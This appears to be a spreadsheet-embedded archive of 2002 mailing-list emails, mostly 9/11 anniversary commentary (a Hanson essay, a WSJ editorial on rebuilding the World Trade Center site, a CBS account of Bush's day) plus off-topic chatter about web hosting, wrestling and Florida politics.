&gt; &gt; i need a smoke.
&gt; &gt; 
&gt; &gt; stop this heatwave.
&gt; &gt; 
&gt; &gt; bring on winter.
&gt; &gt; 
&gt; &gt; bring on fall.
&gt; &gt; 
&gt; &gt; 
&gt; &gt; Swerve, shut up.
&gt; &gt; 
&gt; &gt; bye.
&gt; 
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">XDegrees was at the WebDAV Interoperability Testing Event last year, so
there may be some DAV under the hood there someplace.- Jim&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
&gt; Gordon Mohr
&gt; Sent: Wednesday, September 11, 2002 12:00 AM
&gt; To: fork@spamassassin.taint.org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
</t>
  </si>
  <si>
    <t xml:space="preserve">
http://www.nationalreview.com/hanson/hanson091102.asp
September 11, 2002 8:00 a.m.
The Wages of September 11
There is no going back.September 11 changed our world. Those who deny such a watershed event take a
superficially short-term view, and seem to think all is as before simply
because the sun still rises and sets.This is a colossal misjudgment. The collapse of the towers, the crashing
into the Pentagon, and the murder of 3,000 Americans Â— all seen live in real
time by millions the world over Â— tore off a scab and exposed deep wounds,
which, if and when they heal, will leave ugly scars for decades. The killers
dealt in icons Â— the choice of 911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imagine.Islamic fundamentalism has proved not ascendant, but static, morally
repugnant Â— and the worst plague upon the Arab world since the Crusades. By
lurking in the shadows and killing incrementally through stealth, the
vampirish terrorists garnered bribes and subsidies through threats and
bombs; but pale and wrinkled in the daylight after 9/11, they prove only
ghoulish not fearsome.The more the world knows of al Qaeda and bin Laden, the more it has found
them both vile and yet banal Â—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7,000 miles for your head prompts abject flight and
an occasional cheap infomercial on the run. And the ultimate consequence of
the attacks of September 11 will not merely be the destruction of al Qaeda,
but also the complete repudiation of the Taliban, the Iranian mullocracy,
the plague of the Pakistani madrassas, and any other would-be fundamentalist
paradise on earth.Foreign relations will not be the same in our generation. Our coalition with
Europe, we learn, was not a partnership, but more mere alphabetic
nomenclature and the mutual back scratching of Euro-American globetrotters Â—
a paper alliance without a mission nearly 15 years after the end of the Cold
War. The truth is that Europe, out of noble purposes, for a decade has
insidiously eroded its collective national sovereignty in order to craft an
antidemocratic EU, a 80,000-person fuzzy bureaucracy whose executive power
is as militarily weak as it is morally ambiguous in its reliance on often
dubious international accords. This sad realization September 11 brutally
exposed, and we all should cry for the beloved continent that has for the
moment completely lost its moral bearings. Indeed, as the months progressed
the problems inherent in "the European way" became all too apparent:
pretentious utopian manifestos in lieu of military resoluteness, abstract
moralizing to excuse dereliction of concrete ethical responsibility, and
constant American ankle-biting even as Europe lives in a make-believe Shire
while we keep back the forces of Mordor from its picturesque borders, with
only a few brave Frodos and Bilbos tagging along. Nothing has proved more
sobering to Americans than the skepticism of these blinkered European
hobbits after September 11.America learned that "moderate" Arab countries are as dangerous as hostile
Islamic nations. After September 11, being a Saudi, Egyptian, or Kuwaiti
means nothing special to an American Â— at least not proof of being any more
friendly or hostile than having Libyan, Syrian, or Lebanese citizenship.
Indeed, our entire postwar policy of propping up autocracies on the triad of
their anticommunism, oil, and arms purchases Â— like NATO Â— belongs to a
pre-9/11 age of Soviet aggrandizement and petroleum monopolies. Now we learn
that broadcasting state-sponsored hatred of Israel and the United States is
just as deadly to our interests as scud missiles Â— and as likely to come
from friends as enemies. Worst-case scenarios like Iran and Afghanistan
offer more long-term hope than "stable regimes" like the Saudis; governments
that hate us have populations that like us Â— and vice versa; the Saudi royal
family, whom 5,000 American troops protect, and the Mubarak autocracy, which
has snagged billions of American dollars, are as afraid of democratic
reformers as they are Islamic fundamentalists. And with good reason: Islamic
governments in Iran and under the Taliban were as hated by the masses as
Arab secular reformers in exile in the West are praised and championed.The post-9/11 domestic calculus is just as confusing. Generals and the
military brass call civilians who seek the liberation of Iraq "chicken
hawks" and worse. Yet such traditional Vietnam-era invective I think rings
hollow after September 11, and sounds more like McClellan's shrillness
against his civilian overseers who precipitously wanted an odious slavery
ended than resonant of Patton's audacity in charging after murderous Nazis.
More Americans were destroyed at work in a single day than all those
soldiers killed in enemy action since the evacuation of Vietnam nearly 30
years ago. Indeed, most troops who went through the ghastly inferno of
Vietnam are now in or nearing retirement; and, thank God, there is no
generation of Americans in the present military Â— other than a few thousand
brave veterans of the Gulf, Mogadishu, and Panama Â— who have been in
sustained and deadly shooting with heavy casualties. Because American
soldiers and their equipment are as impressive as our own domestic security
is lax, in this gruesome war it may well be more perilous to work high up in
lower Manhattan, fly regularly on a jumbo jet, or handle mail at the
Pentagon or CIA than be at sea on a sub or destroyer.Real concern for the sanctity of life may hinge on employing rather than
rejecting force, inasmuch as our troops are as deadly and protected abroad
as our women, children, aged, and civilians are impotent and vulnerable at
home. It seems to me a more moral gamble to send hundreds of pilots into
harm's way than allow a madman to further his plots to blow up or infect
thousands in high-rises.Politics have been turned upside down. In the old days, cynical
conservatives were forced to hold their noses and to practice a sometimes
repellent Realpolitik. In the age of Russian expansionism, they were loathe
to champion democracy when it might usher in a socialist Trojan Horse whose
belly harbored totalitarians disguised as parliamentarians. Thus they were
so often at loggerheads with naÃ¯ve and idealist leftists.No longer. The end of the specter of a deadly and aggressive Soviet
Communism has revived democratic ideology as a force in diplomacy. Champions
of freedom no longer sigh and back opportunistic rightist thugs who promise
open economics, loot their treasuries, and keep out the Russians. Instead,
even reactionaries are now more likely to push for democratic governments in
the Middle East than are dour and skeptical leftists. The latter, if
multiculturalists, often believe that democracy is a value-neutral Western
construct, not necessarily a universal good; if pacifists, they claim
nonintervention, not justice, as their first priority. The Right, not the
Left, now is the greater proponent of global freedom, liberation, and
idealism Â— with obvious domestic ramifications for any Republican president
astute enough to tap that rich vein of popular support.All this and more are the wages of the disaster of September 11 and the
subsequent terrible year Â— and yet it is likely that, for good or evil, we
will see things even more incredible in the twelve months ahead.</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1Say 'amen' somebody. What the WSJ said, appended below.
The WTC, as constructed, was a confiscatory government boondoggle,
expropriated from the original pre-construction property owners at
the behest of a third-generation trust-fund-aristocrat for the "good"
of the city, and owned by an "authority" looking for something else
to do after it, and its coach-hounds in organized labor and organized
crime, had killed what was the largest port in the world's richest
nation.Now, of course, it's about to get worse. The sins of 40 years ago
have been compounded at the hands of two kinds of literally
irrational fanatics, first those in religion, and now those in
government.As a result, a large part of 10 million square feet of once perfectly
usable office space, devoted, at least ostensibly, to commerce, will
be "granted" away  in a potlatch that only government, and
special-interest "communities", (or "stakeholders", or whatever the
cryptosocialist psycho-rabble call themselves this week) can organize
to such perfection.
All this in probably the *only* city in the country that was founded
by a *business*, explicitly for the purpose of *commerce*. Not
religious fanaticism. Not colonial expansion in a monarch's name.
*Commerce*.
If they *really* wanted to make a point to the superstitious luddites
who collapsed those buildings (using probably the only sharp objects
on a plane full of government-disarmed passengers) the so-called
"authority" should disband itself and sell its property off to the
highest bidder and let the *market* -- the cure to all luddism,
foreign and domestic, government and superstitious -- decide.If the new, *private* owner wants to sell, or give away, a space for
a memorial, fine. They could sell tickets and donate the money to the
families of the dead and injured. Probably great for marketing the
property, at least during the lifetime of anyone who remembers the
event.And, of course, if the new owner wants to build something twice as
tall, or with twice as much space than the original 10 million square
feet, splendid. Whatever the market will bear.
In these days of increasingly ubiquitous trans-national geodesic
internetworks, of strong financial cryptography, and of exponentially
decreasing transaction costs in formerly monolithic industries,
economics and freedom can, and will, prevail over both superstition
and statism.It's probably too much to hope for an actual market in lower
Manhattan mega-real-estate to prevail this early in the game, but
it's going to happen sooner or later.And, whenever it does, *that* will be a fitting memorial to those who
died at the World Trade Center.Cheers,
RAH- -------http://online.wsj.com/article_print/0,,SB1031705210159756235,00.html
The Wall Street JournalSeptember 11, 2002
REVIEW &amp; OUTLOOKA Living MemorialAs we write these words, we can look down from our offices into the
six-story crater where the Twin Towers once stood. Like everyone
else, we want that site to be rebuilt in a way that honors those who
died a year ago. But we also think the best memorial to those who
perished would be a living one.The site of the World Trade Center calls forth many emotions,
especially today: anger, grief and respect for the many acts of
heroism that took place there. But underlying it all is the memory of
the enormous vitality that distinguished the towers before they were
attacked and was a large reason they were targeted. The best
expression of the spirit of New York and of those who died would be
to once again see thousands of people from dozens of countries
working, meeting, shopping, eating -- that is, engaged in the sort of
productive work and play that used to take place there. Osama bin
Laden should not be allowed to have turned it into a cemetery.But restoring this memory is not what the discussion in New York has
been about. So far no one is talking seriously about the vigorous
rebuilding of downtown Manhattan, which lost 100,000 jobs when the
Trade Center fell. Instead the discussion centers on the size and
scale of the memorial, and on satisfying every political interest now
clamoring for a piece of the action. New York's political leadership,
and its financial and media elites, are squandering a historic chance
to rebuild a better, more prosperous city.This is in part the fault of the commission tasked with figuring out
what to do with the site. In consultation with New York Governor
George Pataki, who is thinking primarily about his own November
re-election, the commission made the decision to focus first on the
memorial. The Manhattan Institute's Steve Malanga argues that the
commission would have been better off setting aside a limited space
for the memorial, getting on with the rebuilding and then returning
to the memorial. This is in essence what the Pentagon has so
successfully done -- rebuild immediately and set aside two acres for
an outdoor memorial, a design for which has yet to be decided.A big part of the problem in New York is that the city's
anti-development activists know an opening when they see one. They
want the World Trade Center site -- and even some surrounding areas
- -- transformed into an enormous park. These political advocates have
had plenty of practice at turning proposed development projects in
New York into a nightmare of delay and litigation, and the World
Trade Center site is now getting the same treatment. Worse, they are
cynically using some bereaved family members to advance their own
anti-development agenda in the name of "honoring" the dead. One
family group even called a press conference to reject as
disrespectful a proposed train line under the site.We are not experts in designing war memorials, but we're confident
that a gigantic park in the heart of the world's financial center
isn't the appropriate choice for those who died a year ago. The great
cities of Europe and Japan, devastated in World War II, have all
rebuilt, and with memorials that are integrated into modern urban
life. Perhaps the most powerful is found in Rotterdam, the Dutch port
city reduced to rubble by German bombing, where survivors erected a
statue of a man with a hole where his heart used to be.In this country, the practice has been for the names of war dead to
be inscribed on the walls of institutions with which they were
affiliated. If you walk into Nassau Hall at Princeton University,
you'll find the names of 644 alumni who died in the Revolutionary
War, the War of 1812, the Civil War, the Spanish-American War, World
War I, World War II, Korea and Southeast Asia. No one thinks it
disrespectful to the dead that the life of the university goes on
around the walls containing their names.In New York now, it would help if political leaders looked beyond the
emotional tug of the victims and their families to the city's future.
Rudolph Giuliani, now that he's out office, wants the entire 16 acres
devoted to the memorial. Governor Pataki has called for no structures
on the "footprints," which, being in the center of the site, would
severely curtail options. Mayor Michael Bloomberg initially raised
his voice in favor of commercial development but was bloodied by the
press and has since ducked for cover.Maybe things will be different after this anniversary is past. Maybe
those responsible for the World Trade Center site will start thinking
more about the next 50 or 100 years than the past 12 months. The best
way to honor the dead is by reviving normal life and commerce.-----BEGIN PGP SIGNATURE-----
Version: PGP 7.5iQA/AwUBPX9zD8PxH8jf3ohaEQI2aACgv7mtb5VKTpRj5MJQt1OyzyifzusAn273
fgNkOntna6+SmLO8TB4XYbC2
=09az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</si>
  <si>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http://www.phc.mpr.org/posthost/index.shtmlDear Garrison,There are at least six plans about what to do with
"Ground Zero" in New York. I believe a suitable memorial
surrounded by a lovely park with benches, walkways,
children's playgrounds, possibly some concessions such
as a restaurant, small theater and a place for art works
would be the best tribute to those who lost their lives.
What do you think should done with the space?Joe Adams
Hillsdale, New JerseyI dread the thought of a big memorial in Manhattan
that's designed by committee and that's gone through
public hearings and so forth ----- it's going to be cold
and ugly and pretentious and the upshot will be one more
public space that the public hates, of which there are
plenty already. New York is a bustling commercial city
and that's the beauty of it, it's a city of young
ambitious dreamy people, like the folks who died in the
towers, and it's not a memorializing city. Historic
events occurred in New York that in any other city would
be commemorated with interpretive centers and guides and
historical museums and in New York there's barely a
little plaque. That's a great thing, in my estimation.
It's a hustling city, full of immigrants looking for
their big chance, and compared to that spirit of
entrepreneurship, a memorial plaza with a fountain and a
statue of something seems dead to me. Look at Grant's
Tomb. Who walks past it and thinks about President
Grant? Nobody. People sit in the plaza by Grant's Tomb
and think about lunch, about sex, about money, about all
the things that New York is about. If you want to find
Grant, read his memoirs. His monument seems odd in New
York: it belongs in Washington, which is our memorial
city. New York is for the young and lively.</t>
  </si>
  <si>
    <t xml:space="preserve">On 11 Sep 2002, Gary Lawrence Murphy wrote:&gt; So then why does my webhost _still_ only give me 200MB?Because ~10 krpm server SCSII doesn't follow the curve. Most rackspace is
ridiculously expensive/unit, so people don't use low end EIDE hardware 
there.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hanson is always good.One of my sci-fi authors is planning on slipping the following line into
one of their stories:"The worst strategic mistake since the 911 attacks".&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Bill
&gt; Stoddard
&gt; Sent: Wednesday, September 11, 2002 9:37 AM
&gt; To: Fork@Xent.Com
&gt; Subject: Hanson's Sept 11 message in the National Review
&gt; 
&gt; 
&gt; http://www.nationalreview.com/hanson/hanson091102.asp
</t>
  </si>
  <si>
    <t xml:space="preserve">i though this was all rather interesting, first bit of 9/11 coverage that 
i've liked.http://www.salon.com/mwt/feature/2002/09/11/forbidden_letters/index.htmlChris
</t>
  </si>
  <si>
    <t xml:space="preserve">
Is this old bits? It should be.I was browsing the local zine store here in Portland OR and found the
second issue of The Thresher...very very sweet. Poltical socio articles on
all manner of things from names you have come to love/despise over the
years. If you have not already, tombobjoewhore says check it out.www.thethresher.com</t>
  </si>
  <si>
    <t xml:space="preserve">
Gays, gay sex, gay marriage.....wooohooo its been a mano e mano week and
thursady will be the mass market consumer period on it.The WWE's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2 years than a wood chuck who could chuck wood if the
enviromentalists did not slap lawsuits on them, the sotrywrites seemed to
have finaly hit on a big tie togther event for several story lines.But of course, no one here watches the WWE, and not even because you would
rather watch old Divxs of the ECW, so this little bit is probably fallign
on the old killsawfiles.SO I wont be bursting anyones thursdaynight plans if I smarkout and say
that B and C waver near the final vows, the blame is falling on Ricco,
thier "manager"*, for  pushing them to carry out their "gay" act far too
long and just when things look to be heating up with that story
arc......the mask comes off the justice of the piece as he pronounces
that they have gone 3  minutes, yes 3 minutes, too long.....Yep, its the
Bisch and in come Rosey  and Jamal to attempt a stomping on Stpehnie
McMahon. Hopefully they did  not get off a kick like they did on the first
lesbain back on Mondays raw as that broke a rib.Of course the editing truck boys might change some none or all of this
around, so if thursday nights tape play reveals them hitch and on thier
way to a honeymoon, thats the luck o the smarkies. I doubt it will be
edited much though from the way I heard it.So the bottomline is, they really were not gay all along, they were play
acting and it got out of hand because Ricco made them, Steaphnie gets a
face push while the Bisch gets a thursady night special 3 min heel push,
thus furthing the story arc of the brand split. Rosey and Jamala  get heat
and B and C get a new Tag Team to play with.  Ricco..who knows, maybe some
heat time would be good for him as a single.All this of course at a time when the ratting are in the bottom of a 4
year valley of gloom, the last 2 years have been mostly squandered on
borken story arc promises and bad acting, and to top it all off Mick is no
longer ont he sceen so...bang bang...how can it be all good?Well, its back to my growing ECW divx collection where Tajiri was the shiz
and Mick cut promos unrivaled by any of todays mic monkeys.* Todays managers are a far cry form the managers of the 80's/early 90's.
Ricco is nota  Paul Bearer or a Jimmy Heart at all but more like a buddy
who goes to the ring with them and occasional interferes..ugh.
</t>
  </si>
  <si>
    <t>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</si>
  <si>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yeshterday we f*cked up our gubernatorial election, too.  results to be
contested by reno.  same six districts that were sued in 2000 still came up
gimpy.i suggested to jeb via e-mail we hold a run-off pinata party.  hoist up a
papier mache donkey and a papier mache elephant.  first one to batted open
wins.-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom
Sent: Wednesday, September 11, 2002 9:16 PM
To: fork@spamassassin.taint.org
Subject: Bush blew take two
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</si>
  <si>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meant "gubernatorial PRIMARY."-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Geege
Schuman
Sent: Wednesday, September 11, 2002 9:32 PM
To: Tom; fork@spamassassin.taint.org
Subject: RE: Bush blew take two
yeshterday we f*cked up our gubernatorial election, too.  results to be
contested by reno.  same six districts that were sued in 2000 still came up
gimpy.i suggested to jeb via e-mail we hold a run-off pinata party.  hoist up a
papier mache donkey and a papier mache elephant.  first one to batted open
wins.-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom
Sent: Wednesday, September 11, 2002 9:16 PM
To: fork@spamassassin.taint.org
Subject: Bush blew take two
http://www.washingtonpost.com/wp-dyn/articles/A63543-2002Sep10.html"MIAMI, Sept. 10 -- A two-gram rock of crack
cocaine was found inside the shoe of Florida
Gov. Jeb Bush's 25-year-old daughter by workers
at the central Florida rehabilitation center
where she is undergoing court-ordered drug
treatment, Orlando police said today.Noelle Bush was not arrested because witnesses
would not give sworn statements, but the
incident is under investigation, according to
Orlando police spokesman Orlando Rolon."Wow, the witnesses would not nark of a Bush girl in an era where there are
no mare restrictions on being held without a cause?Imagine that...-tom</t>
  </si>
  <si>
    <t xml:space="preserve">
Interesting ebay item......(and no it wasnt me even though the spellingis
oddly familar)http://cgi.ebay.com/aw-cgi/eBayISAPI.dll?MfcISAPICommand=ViewItem&amp;item=1764085998
</t>
  </si>
  <si>
    <t xml:space="preserve">
"60 Minutes II" Bush Interview:(CBS)Â No president since Abraham Lincoln has seen such horrific loss of 
life in a war on American soil. No president since James Madison, nearly 
200 years ago, has seen the nationâ€™s capital city successfully attacked. 
But, one year ago, President George W. Bush was thrown into the first 
great crisis of the 21st century.This is the presidentâ€™s story of September 11th and the week America 
went to war. 60 Minutes II spent two hours with Mr. Bush, one, on Air 
Force One and another in the Oval Office last week. Even after a year, 
the president is still moved, sometimes to the point of tears, when he 
remembers Sept. 11.â€œI knew, the farther we get away from Sept.11, the more likely it is for 
some around the world to forget the mission, but not me,â€ Mr. Bush says 
during the Air Force One interview. â€œNot me. I made the pledge to myself 
and to people that Iâ€™m not going to forget what happened on Sept. 11. So 
long as Iâ€™m president, we will pursue the killers and bring them to 
justice. We owe that to those who have lost their lives.â€The memories come back sharp and clear on Air Force One, where Pelley 
joined the president for a recent trip across country. 60 Minutes II 
wanted to talk to him there because that is where he spent the first 
hours after the attack.Not since Lyndon Johnson was sworn in on Air Force One has the airplane 
been so central to America in a crisis.For President Bush, Sept. 11 2001, started with the usual routine. 
Before dawn, the president was on his four-mile run. It was just before 
6 a.m. and, at the same moment, another man was on the move: Mohammad 
Atta. Two hours later, as Mr. Bush drove to an elementary school, 
hijackers on four planes were murdering the flight crews and turning the 
airliners east. As the motorcade neared the school at 8:45 a.m., jet 
engines echoed in Manhattan.Atta plunged the 767 jumbo jet into World Trade Center Tower One.â€œI thought it was an accident,â€ says Mr. Bush. â€œI thought it was a pilot 
error. I thought that some foolish soul had gotten lost and - and made a 
terrible mistake.â€Mr. Bush was told about the first plane just before sitting down with a 
class of second graders. He was watching a reading drill when, just 
after nine, United Flight 175 exploded into the second tower. There was 
the sudden realization that what had seemed like a terrible mistake was 
a coordinated attack.Back in the Florida classroom, press secretary Ari Fleischer got the 
news on his pager. The presidentâ€™s chief-of-staff, Andy Card stepped in.â€œA second plane hit the second tower; America is under attack,â€ Card 
told the presidentWhen he said those words, what did he see in the Presidentâ€™s face?â€œI saw him coming to recognition of what I had said,â€ Card recalls. â€œI 
think he understood that he was going to have to take command as 
commander-in-chief, not just as president.â€What was going through Bushâ€™s mind when he heard the news?â€œWeâ€™re at war and somebody has dared attack us and weâ€™re going to do 
something about it,â€ Mr. Bush recalls. â€œI realized I was in a unique 
setting to receive a message that somebody attacked us, and I was 
looking at these little children and all of the sudden we were at war. I 
can remember noticing the press pool and the press corps beginning to 
get the calls and seeing the look on their face. And it became evident 
that we were, you know, that the world had changed.â€Mr. Bush walked into a classroom set up with a secure phone. He called 
the vice president, pulling the phone cord tight as he spun to see the 
attack on TV. Then he grabbed a legal pad and quickly wrote his first 
words to the nation."Ladies and gentlemen, this is a difficult moment for America,â€ he said 
in the speech. â€œToday, weâ€™ve had a national tragedy.â€It was 9:30 a.m. As he spoke, Mr. Bush didnâ€™t know that two more 
hijacked jets were streaking toward Washington. Vice Pesident Dick 
Cheney was in his office at the White House when a Secret Service agent 
ran in.â€œHe said to me, â€˜Sir, we have to leave immediatelyâ€™ and grabbed, put a 
hand on my belt, another hand on my shoulder and propelled me out the 
door of my office,â€ Cheney recalls. â€œIâ€™m not sure how they do it, but 
they sort of levitate you down the hallway, you move very fast.â€â€œThere wasnâ€™t a lot of time for chitchat, you know, with the vice 
president,â€ says Secret Service Director Brian Stafford, who was in his 
command center ordering the round-up of top officials and the First 
Family. He felt that he had only minutes to work with. â€œWe knew there 
were unidentified planes tracking in our direction,â€ he says.Cheney was rushed deep under the White House into a bunker called the 
Presidential Emergency Operations Center. It was built for war, and this 
was it. On her way down, National Security Advisor Condoleezza Rice 
called Mr. Bush.â€œIt was brief because I was being pushed to get off the phone and get 
out of the West Wing,â€ says Rice. â€œThey were hurrying me off the phone 
with the president and I just said, he said, â€˜Iâ€™m coming backâ€™ and we 
said â€˜Mr. President that may not be wise.â€™ I remember stopping briefly 
to call my family, my aunt and uncle in Alabama and say, â€˜Iâ€™m fine. You 
have to tell everybody that Iâ€™m fineâ€™ but then settling into trying to 
deal with the enormity of that moment, and in the first few hours, I 
think the thing that was on everybodyâ€™s mind was how many more planes 
are coming.â€The Capitol was evacuated. And for the first time ever, the Secret 
Service executed the emergency plan to ensure the presidential line of 
succession. Agents swept up the 15 officials who stood to become 
president if the others were killed. They wanted to move Vice President 
Cheney, fearing he was in danger even in the bunker. But Cheney says 
when he heard the other officials were safe, he decided to stay at the 
White House, no matter what.â€œItâ€™s important to emphasize it's not personal, you donâ€™t think of it in 
personal terms, youâ€™ve got a professional job to do,â€ says Cheney.Cheney was joined by transportation secretary Norm Mineta who remembers 
hearing the FAA counting down the hijacked jets closing in on the 
capital.Says Mineta: â€œSomeone came in and said â€˜Mr. Vice president thereâ€™s a 
plane 50 miles out,â€™ then he came in and said â€˜Its now 10 miles out, we 
donâ€™t know where it is exactly, but itâ€™s coming in low and fast.â€™â€It was American Flight 77. At 9:38 a.m., it exploded into the Pentagon, 
the first successful attack on Washington since the War of 1812.As the Pentagon burned, Mr. Bushâ€™s limousine sped toward Air Force One 
in Florida. At that moment, United Flight 93 - the last hijacked plane - 
was taking dead aim at Washington. At the White House, the staff was in 
the West Wing cafeteria, watching on TV. Press Secretary Jennifer 
Millerwise was in the crowd when the order came to evacuate.â€œI no sooner walked outside when someone from the Secret Service yelled 
â€˜Women drop your heels and run, drop your heels and run,â€™ and suddenly 
the gates that never open except for authorized vehicles just opened and 
the whole White House just flooded out,â€ she recalls.In Florida, as Mr. Bush boarded Air Force One, he was overheard telling 
a Secret Service agent â€œBe sure to get the First Lady and my daughters 
protected.â€ At 9:57 a.m., Air Force One thundered down the runway, 
blasting smoke and dust in a full -hrust take off. Communications 
Director Dan Bartlett was on board.â€œIt was like a rocket,â€ he remembers. â€œFor a good ten minutes, the plane 
was going almost straight up.â€At the same moment, 56 minutes after it was hit, World Trade Center 
Tower Two began to falter, then cascade in an incomprehensible avalanche 
of steel, concrete and human lives.â€œSomeone said to me, â€˜Look at thatâ€™ I remember that, â€˜Look at thatâ€™ and 
I looked up and I saw and I just remember a cloud of dust and smoke and 
the horror of that moment,â€ recalls Rice of the TV newscast.She also felt something in her gut: â€œThat weâ€™ve lost a lot of Americans 
and that eventually we would get these people. I felt the anger. Of 
course I felt the anger.â€Down in the bunker, Cheney was trying to figure out how many hijacked 
planes there were. Officials feared there could be as many as 11.As the planes track toward Washington, a discussion begins about whether 
to shoot them down. â€œI discussed it with the president,â€ Cheney 
recalls. â€œâ€˜Are we prepared to order our aircraft to shoot down these 
airliners that have been hijacked?â€™ He said yes.â€â€œIt was my advice. It was his decision,â€ says Cheney.â€œThatâ€™s a sobering moment to order your own combat aircraft to shoot 
down your own civilian aircraft,â€ says Bush. â€œBut it was an easy 
decision to make given the â€“ given the fact that we had learned that a 
commercial aircraft was being used as a weapon. I say easy decision, it 
was, I didnâ€™t hesitate, let me put it that way. I knew what had to be 
done.â€The passengers on United Flight 93 also knew what had to be done. They 
fought for control and sacrificed themselves in a Pennsylvania meadow. 
The flight was 15 minutes from Washington.â€œClearly, the terrorists were trying to take out as many symbols of 
government as they could: the Pentagon, perhaps the Capitol, perhaps the 
White House. These people saved us not only physically but they saved us 
psychologically and symbolically in a very important way, too,â€ says 
Rice.Meanwhile, Tower One was weakening. It had stood for an hour and 43 
minutes. At 10:29 a.m., it buckled in a mirror image of the collapse of 
its twin.The image that went round the world reached the First Lady in a secure 
location somewhere in Washington. â€œI was horrified,â€ she says. â€œI 
thought, â€˜Dear God, protect as many citizens as you can.â€™ It was a 
nightmare.â€By 10:30 a.m., Americaâ€™s largest city was devastated, its military 
headquarters were burning. Air force One turned west along the Gulf 
Coast.â€œI can remember sitting right here in this office thinking about the 
consequences of what had taken place and realizing it was the defining 
moment in the history of the United States,â€ says President Bush. â€œI 
didnâ€™t need any legal briefs, I didnâ€™t need any consultations, I knew we 
were at war.â€Mr. Bush says the first hours were frustrating. He watched the 
horrifying pictures, but the TV signal was breaking up. His calls to 
Cheney were cutting out. Mr. Bush says he pounded his desk shouting, 
â€œThis is inexcusable; get me the vice president.â€â€œI was trying to clear the fog of war, and there is a fog of war, says 
the president. "Information was just flying from all directions.â€Chief of staff Card brought in the reports. There was word Camp David 
had been hit. A jet was thought to be targeting Mr. Bushâ€™s ranch.â€œI remember hearing that the State Department might have been hit, or 
that the White House had a fire in it. So we were hearing lots of 
different information,â€ says Card.They also feared that Air Force One itself was a target. Cheney told the 
president there was a credible threat against the plane. Using the code 
name for Air Force One, Mr. Bush told an aide, â€œAngel is next.â€ The 
threat was passed to presidential pilot Colonel Mark Tillman.â€œIt was serious before that but now it is -no longer is it a time to get 
the president home,â€ Tillman says. â€œWe actually have to consider 
everything we say, everything we do could be intercepted, and we have to 
make sure that no one knows what our position is.â€Tillman asked for an armed guard at his cockpit door while Secret 
Service agents double-checked the identity of everyone on board. The 
crew reviewed the emergency evacuation plan. Then came a warning from 
air traffic control â€“ a suspect airliner was dead ahead.â€œComing out of Sarasota there was one call that said there was an 
airliner off our nose that they did not have contact with,â€ Tillman 
remembers.Tillman took evasive action, pulling his plane high above normal 
traffic. They were on course for Washington, but by now no one thought 
that was a good idea, except the president.â€œI wanted to come back to Washington, but the circumstances were such 
that it was just impossible for the Secret Service or the national 
security team to clear the way for Air Force One to come back,â€ says 
Bush.So Air Force One set course for an underground command center in 
Nebraska. Back in Washington, the presidentâ€™s closest advisor, Karen 
Hughes, heard about the threat to the plane and placed a call to Mr. 
Bush.â€œAnd the military operator came back to me and in a voice that, to me, 
sounded very shaken said, â€˜Maâ€™am, Iâ€™m sorry, we canâ€™t reach Air Force 
One.â€™â€ Hughes recalls. Hughes was out of the White House during the 
attacks. When she came back, it was a place she didnâ€™t recognize.â€œThere were either military, or maybe Secret Service, dressed all in 
black, holding machine guns as, as we drove up. And I never expected to 
see something like that in, in our nation's capital,â€ says Hughes.When she walked into the White House, no one was inside. â€œI knew it was 
a day that you didn't want to surprise anybody, and so I yelled, 
â€˜Hello?â€™ and two, again, kind of SWAT team members came running, running 
through the, the hall with, again, guns drawn, and then took me to, to 
the location where I met the vice president.â€On Air Force One, Col. Tillman had a problem. He needed to hide the most 
visible plane in the world, a 747 longer than the White House itself. He 
didnâ€™t want to use his radio, because the hijackers could be listening 
to air traffic control. So he called air traffic control on the 
telephone.â€œWe actually didn't tell them our destination or what directions we were 
heading,â€ says Tillman. â€œWe, we basically just talked to 'em and said, 
'OK, fine, we have no clearance at this time, we are just going to fly 
across the United States.'â€Controllers passed Air Force One from one sector to another, warning 
each other to keep the route secret.â€œOK, whereâ€™s he going?â€ one tower radioed to another.â€œJust watch him,â€ a second tower responded. â€œDonâ€™t question him whereâ€™s 
he's going. Just work him and watch him, thereâ€™s no flight plan in and 
weâ€™re not going to put anything in. Ok, sir?â€Air Force One ordered a fighter escort, and air traffic control radioed 
back: â€œAir Force One, got two F-16s at about your 10 oâ€™clock position.â€â€œThe staff, and the president and us, were filed out along the outside 
hallway of his presidential cabin there and looking out the windows,â€ 
says Bartlett. â€œAnd the president gives them a signal of salute, and the 
pilot kind of tips his wing, and fades off and backs into formation.â€The men in the F-16s were Shane Brotherton and Randy Roberts, from the 
Texas Air National Guard. Their mission was so secret their commander 
wouldnâ€™t tell them where they were going.â€œHe just said, 'Youâ€™ll know when you see it,' and that was my first 
clue, I didnâ€™t have any idea what we were going up until that point,â€ 
says Brotherton. He knew when he saw it.â€œWe, we were trying to keep an 80-mile bubble, bubble around Air Force 
One, and we'd investigate anything that was within 80 miles,â€ says 
Roberts.Bush says he was not worried about the safety of the people on this 
aircraft, or for his own safety: â€œI looked out the airplane and saw two 
F-16s on each wing. It was going to have to be a pretty good pilot to 
get us.â€We now know that the threat to Air Force One was part of the fog of war, 
a false alarm. But it had a powerful effect at the time. Some wondered, 
with the president out of sight, was he still running the government? He 
hadnâ€™t appeared after the attack on Washington. Mr. Bush was clearly 
worried about it. At one point he was overheard saying, â€œThe American 
people want to know where their dang president is.â€ The staff considered 
an address to the nation by phone but instead Mr. Bush ordered Air Force 
One to land somewhere within 30 minutes so he could appear on TV. At 
11:45 a.m., they landed at Barksdale Air Force Base in Louisiana.â€œThe resolve of our great nation is being tested. But make no mistake, 
we will show the world that we will pass this test. God bless,â€ Bush 
said to the nation from Barksdale.At Barksdale, the Secret Service believed the situation in Washington 
was still unsafe. So the plane continued on to Nebraska, to the command 
center where Mr. Bush would be secure and have all the communications 
gear he needed to run the government. Aboard Air Force One, Mr. Bush had 
a job for press secretary Fleischer.â€œThe president asked me to make sure that I took down everything that 
was said. I think he wanted to make certain that a record existed,â€ says 
